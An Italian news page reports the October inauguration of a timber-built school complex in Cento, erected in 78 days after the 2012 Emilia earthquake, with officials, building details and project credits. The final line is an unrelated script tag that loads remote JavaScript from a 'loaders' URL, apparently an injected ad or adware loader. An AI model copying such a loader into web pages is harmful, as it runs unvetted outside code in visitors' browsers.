1. Home
  2. Notizie e Mercato
  3. Terremoto Emilia Romagna: costruzione a tempo di record per il nuovo complesso scolastico di Cento

Terremoto Emilia Romagna: costruzione a tempo di record per il nuovo complesso scolastico di Cento

Lavori pubblici di
5/5
votato da 1 persone
Dopo soli 78 giorni, a fronte dei 100 previsti, è stato inaugurato l’istituto, che comprende una scuola elementare, una scuola media, un refettorio e una palestra, realizzato grazie al sistema costruttivo X-Lam


Domenica 28 ottobre alle ore 10.30 è stato inaugurato il nuovo plesso scolastico di via Pedagna, loc. Corpo Reno, Comune Cento, realizzato a tempo di record, alla presenza del Commissario Straordinario e Presidente della Regione Emilia Romagna Vasco Errani, del Sindaco del Comune di Cento Piero Lodi, del Presidente della Provincia di Ferrara MarcellaZappaterra, del Vicario Generale dell’Arcidiocesi di Bologna Mons. Giovanni Silvagni, del Presidente di ICCREA Holding Giulio Magagni e di tutte le Aziende che hanno contribuito in maniera determinante alla realizzazione di questa fondamentale “pietra miliare” nella ricostruzione post terremoto.

L’inaugurazione è stata preceduta dalla Santa Messa alle ore 9,30 all’interno della palestra.

Si tratta del più grande edificio scolastico (mq. 6.200) costruito dopo il terremoto che ha colpito l’Emilia nel Maggio 2012.

Il Complesso scolastico è stato realizzato con il sistema costruttivo X-LAM, cioè mediante pannelli portanti in legno massiccio a strati incrociati. Il fabbricato presenta una scuola media, una scuola elementare, un refettorio di 300 mq e una palestra di 650 mq, indipendenti ma comunicanti, realizzati completamente in legno. La capienza del complesso scolastico è di 700 ragazzi e comprende 24 aule per l'insegnamento, numerosi laboratori, aule per attività speciali e parascolastiche, servizi e biblioteca.

Progettazione e D.L. Architettonica: AMBIENTEVARIO dell’Arch. Duccio Randazzo e Arch. Francesca Cibelli
Progettazione D.L. Strutturale: Ing. Claudio Contini
Committente: Centro Emilia Terremoto 2012 Srl
Impresa esecutrice: A.T.I: Sistem Costruzioni srl - Corma Elettrica – Impresa Merighi e Df
Estensione: 2 palazzine di 2 piani, palestra e mensa disposti ad “H” per un totale di 6.200 mq
Quantità di legno utilizzata: 1.750 mc
Tempi di realizzazione: 10 Agosto – 28 Ottobre per un totale di 78 gg. (anziché i 100 previsti)
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>